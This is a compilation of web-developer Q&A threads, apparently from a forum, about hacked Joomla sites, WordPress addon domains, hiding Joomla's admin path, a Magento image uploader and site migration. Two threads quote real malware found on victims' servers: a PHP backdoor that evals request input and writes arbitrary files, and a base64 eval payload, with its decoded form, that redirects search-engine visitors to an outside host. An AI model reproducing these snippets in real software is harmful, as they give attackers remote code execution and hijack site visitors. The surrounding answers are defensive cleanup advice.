I have a customer whose Joomla website was hacked, I am not exactly sure how it happened but I can see that there are many scripts that send out spam email, upon searching for files that contain the word eval( I found 61 matches like the following file:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
$mglvq = $_REQUEST['tlhqdsj'];
eval($mglvq);
exit();
}
if (isset($_REQUEST['ofva'])) {
$ulmajcbk = $_REQUEST['tbun'];
$cdpumv = $_REQUEST['ofva'];
$tgcjl = fopen($cdpumv, 'w');
$ogrmbcz = fwrite($tgcjl, $ulmajcbk);
fclose($tgcjl);
echo $ogrmbcz;
exit();
}
?>
I do not want to delete the whole website because I did not develop it, all I need is a security checklist and a way of searching for other known exploits.
What other precautions should I take on the server where this Joomla website is installed?
Any idea how they were able to upload so many files to the server?
This is a botnet PHP file, likely spread through an exploit in Joomla (there was one disclosed in mid-August, for example). It allows a remote user to execute arbitrary PHP code and upload files to your server. See the Joomla security page for more information.
My strongest recommendation would be to wipe the entire server -- or at least anything the customer's user had access to -- and start over. You never know what the attacker has uploaded, and you can never be completely sure there aren't more backdoors present.
If that's infeasible, I recommend wiping the Joomla install and reinstalling with a fresh copy of Joomla 2.5.14 or 3.1.5.
If you can't even do that, well, you can try upgrading Joomla in-place, searching for infected PHP files, and deleting them. You're running a strong risk that you'll miss a file and remain vulnerable, though.
Adding more to the above answer I would like you to read below.
Security Checklist/You have been hacked or defaced
Joomla hacked. How to prevent?
Joomla Security
Vulnerable Extensions List
Related
This is for a client so I won't share exact domains but the problem is as follows..
I took over development of a website from a prior developer.
The hosting is Hostgator Business.
The primary domain is primary.com.
There is an addon domain addon.com.
The primary domain document root is /home1/username/public_html.
The addon's document root is /home1/username/addon.com.
www.addon.com had a WordPress installation which the developer had edited instead of using plugins to achieve his goals. The site also needed a complete redesign so I felt it logical to simply wipe the installation and replace it.
So, I deleted all of the WordPress files and uploaded a new copy of WordPress from wordpress.org/latest.tar.gz
Prior to deleting the old installation, the domain loaded files from it's document root perfectly.
After uploading the new installation instead of resolving to addon.com it is instead resolving to primary.com/addon.com
I've never seen this happen before so I'm lost.
There's no errors in any available logs.
All file permissions are correct.. I've triple-checked.
I've tried deleting all files and creating simple index.php and index.html files to see if it would access them ... it doesn't.
This happens in each browser I use on Windows and Linux.
I don't understand it because all I did was swap out the old WP install for a new one.
I went and re-uploaded the old WordPress installation so everything is 100% how it was but it is still going to primary.com/addon.com instead of addon.com.
Has anyone faced this issue before? I usually use Bluehost but even when I've used Hostgator in the past I've never seen this happen.
I double-checked the addon domain settings as well as anything else I could think of and everything appears normal.
I even deleted the addon domain and re-added it with the document root of /home1/username/addon.com and it still goes to primary.com/addon.com in the browser.
I submitted a ticket with Hostgator but they have not replied yet.
I'm sorry if this is long. This is my first time asking for help on here and I wanted to be sure I included everything I could.
Hostgator finally got back to me.
The previous developer had used the one-click WordPress install.
Apparently once someone uses a one-click install the only way it works is if you keep using the one-click install/you cannot do it manually any more.
From all the servers and sites I've setup this makes no sense and is a problem with Hostgator. Support did not really tell me anything other than "you have to use the one click install since the prior developer did". Great service.
Hope this saves someone some hassle.
From this it sounds like you were moving a WordPress site from the primary domain to an add on domain.
Simply moving the files from the primary to the add on domain will not make it work on the add on domain because in the database and throughout the coding of the WordPress site it would all be configured and coded for the primary domain.
It sounds like you would need to update the site home and site url from the primary to the add on domain url.
http://support.hostgator.com/articles/specialized-help/technical/wordpress/wordpress-home-fix
Also I would be suggest using a search and replace type plugin to go through all the internal coding to update the urls and links to the add on domain.
There is more information here as well http://codex.wordpress.org/Moving_WordPress
Lately my Joomla website was not showing properly, only the background image was loading, and some minor things.
Somehow the page template (index.php) was changed and some extra code was added. Specifically, this code:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wb2FzbS5xcG9lLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
was introduced several times throughout the php code, which is causing slow loading times (about 15-20 seconds to load any page) in my website.
It appears your site was hacked, this means it can be hacked again.
If you're using Joomla 1.5 you should make upgrade to at least the 2.5.x line, if you can't make sure you using version 1.5.26.
Next check all the extensions you have installed against the VEL (Joomla!'s Vulnerable Extensions List)
Once you've done that, you should secure you site using products like AdminTools or similar highly rated products from the Site Protection section of the Joomla Extensions Directory etc.
By the way that particular payload was built to capture users referred to your site by search engines and redirect them to http://poasm.qpoe.com/ It decodes to this:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"live.com") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://poasm.qpoe.com/");
exit();
}
}
}
}
}
I stumbled upon this comment and was finally able to solve my problem.
Just go to administration --> Extensions --> Template Manager. Go to the Templates section, select your template, select Edit main page template, and get your index.php rid of all those garbage function calls. Cleaning it solved the problem for me, now everything is back to normal, everything loads as fast as before and all the pages display properly.
I`ve been using joomla from past 2 years. As joomla is a very popular CMS for php lovers so hackers are always trying to deface the website in joomla. Anyone can easily detect the website is using on joomla or any other programming language by using wappanalyzer software. In joomla we can access the administrator panel by typing
http://phalana.com/administrator.
So my question is how to change the /administrator to something else so that hackers will not get to the administrator panel. So far i've seen the number of extensions in official joomla directory But still something is lacking on it.Can anyone help me to change the administrator path.
Changing /administrator is a very bad idea for a lot of reasons top amongst, ironically, is security. Apart from that it:
breaks lots of components
cuts you off from easy application of security updates
the effects of renaming are unknown from a security point of view
The best way to secure Joomla's /administrator area is to follow some simple steps...
Add realm authentication to the /administrator directory that way unless you hacker manages to figure out the username and password they're stumped.
Use an extension like JSecure or Akeeba's Admin tools (both allow your to set a "secret word" on the administrator URL) or check the extensions already available in the Login Protection section of the Joomla! Extension directory (called JED for short). N.B. I personally like Admin tools the most, with the /administrator?secreword, their application firewall and the .htaccess maker.
Follow the advice on the Joomla Doc's website Security Checklist
Personally we do all of these things and a bit more... as we keep telling people.
You can protect or hide your /administrator directory by creating an alternative directory wich sets a cookie that is sent to the http header in the request. That cookie will be validated from the index.php file at the /administator directory, if is not validated (when an unauthorized user wants to detect if your site is Joomla based by the known /administrator directory), then it will be redirected to the root directory for your site.
These are the steps.
*create an alternative /administrator directory ie: /admins_place
*inside /admins_place, create an index.php with the following code
snippet
<?php
$admin_cookie_code = "_hashed_secret_code_here_";
setcookie("JoomlaAdminSession", $admin_cookie_code, 0, "/");
header("Location: ../administrator/index.php");
?>
*In administrator directory add this code snippet at the beginning of
the index.php file.
<?php
if($_COOKIE['JoomlaAdminSession'] != "_hashed_secret_code_here") {
header("Location: ../index.php");
}
I hope this helps
I am trying to figure out why the tinyMCE WYSIWYG editor in the CMS module of Magento will not upload images. I can create/delete folders but any file will simply not get uploaded, and there seems to be no message as to why the file is not successfully written on the server.
Anyone may have an idea why?
** Update **
I'm using Magento 1.6.2. I have tried to track down the problem and it seems that the controller never gets executed. I have added a line to log the arguments in the uploadAction() action (in Mage_Adminhtml_Cms_Wysiwyg_ImagesController) and nothing gets logged.
This is project inherited from someone else, and was modified to some extend, but nothing seems to point out that this part of Magento would have been touched in anyway by the modifications.
** EDIT**
The project associated with this question has been dropped and I no longer can provide an answer to this question. If anyone can confirm a working answer (as this problem was apparantly common with Magento), I will gladly mark that answer as "accepted".
Otherwise, I will flag this question for removal for the aformentioned reasons.
Thank you.
Other than solutions provided here, it may occur when you use a CDN (or a different domain) for your javascript and media files in admin panel. If you use CDN, use it for your website(s) scope and use your own domain for default scope. It will make your website(s) media and javascript files to be loaded from CDN, and backend's media and javascript files to be loaded from your own domain. This will solve your problem.
There are some known issues with flash image uploader on Magento. Unfortunately when it falls, it falls silently. Here are some cases when smth can break it:
if you try to use it with secured connection using open ssl certificate
if you're using it on server with apache authentication
on some Magento versions with prototype 1.7
I think the latter is your best bet. Maybe you should try to apply the patch from here: http://www.magentocommerce.com/boards/viewthread/4348/P45/#t327010
In my case it was a cross domain problem, and one quite hard to find if you ask me...
What was puzzling me was that the uploader for product images was working like a charm but the one in the CMS section was failing completely silently. We are serving the skin folder from an Amazon S3 bucket, and the flash uploader lives under that folder.
Interestingly enough, our version of Magento (1.7.0.2) is using two different methods to calculate the path to the SWF file, depending whether you are under CMS or Product update.
The CMS file (app/design/adminhtml/default/default/template/cms/browser/content/uploader.phtml) is using the following method to embed the Flash Uploader:
<?php echo $this->getSkinUrl('media/uploader.swf') ?>
While the Product image uploader is using:
<?php echo $this->getUploaderUrl('media/uploader.swf') ?>
In our case, the first one resolves to the AWS S3 url, obviously in a separate domain, while the second one will still reference the local domain's url.
So yeah, the quick, dirty fix would be to replace getSkinUrl for getUploaderUrl in app/design/adminhtml/default/default/template/cms/browser/content/uploader.phtml. Alternatively you can extend the core to load a different template in which you would have replaced that method.
I hope this helps somebody... I wish I had found something like this five days ago when I first stumbled upon the issue :-)
Are you using flash uploader with https? If so, is your secure address in differente domain (usually used in shareds ssl)?
I got some trouble with this. I solved by installing a flash uploader disabler plugin.
You can download the plugin with this downloader key:
http://connect20.magentocommerce.com/community/Dull_Uploader
I hope it helps.
So i have a client, who has a disc of an entire site. Root server files, all the way to /httphome/ files...
However, it looks like it was created using Joomla. Now, i know my HTMl and CSS but have never used a CMS like Joomla.
To get this site up and running, am i going to have to install Joomla on my clients server, and then upload the files?
i am going to assume its not that easy.... anyone got any insight into this process and what im looking at?
thanks
Keep in mind that Joomla content resides in a MySql database.
You need the following:
Database export
Create a DB on you MySQL server
Upload the files
Edit configuration.php to work with you db and also set your path there
Also, some components might need some more setup, as some of them have their own cfg files.
To get this site up and running (if the file is really the entire site) should be as simple as setting up a web server and pointing it to the directory with the index in it. Joomla should already be in that file. Let me know if i can elaborate on the process.
Since you are new to Joomla, you might want to try loading the disc contents up on your localhost first. Personally, when I'm trying something new, I hate for my first attempts to be somewhat public - I always feel a little safer if I do the first install someplace local where I'm the only person who can see it.
Best of luck with your project! If you run into any problems, or if you want to confirm that the site is definitely Joomla, let us know and we will get you sorted out.
Do you have the related database? The files that make up Joomla are useless without the database. You could install Joomla and upload your files over the top, but any database changes made by any installed extensions wouldn't be made to that install. You'd also be missing all of the actual site content without the database.
If you do have the database, then all you need to do is import the database in you your mySQL, then upload the files you have on the disc and edit configuration.php file with the new database user and password.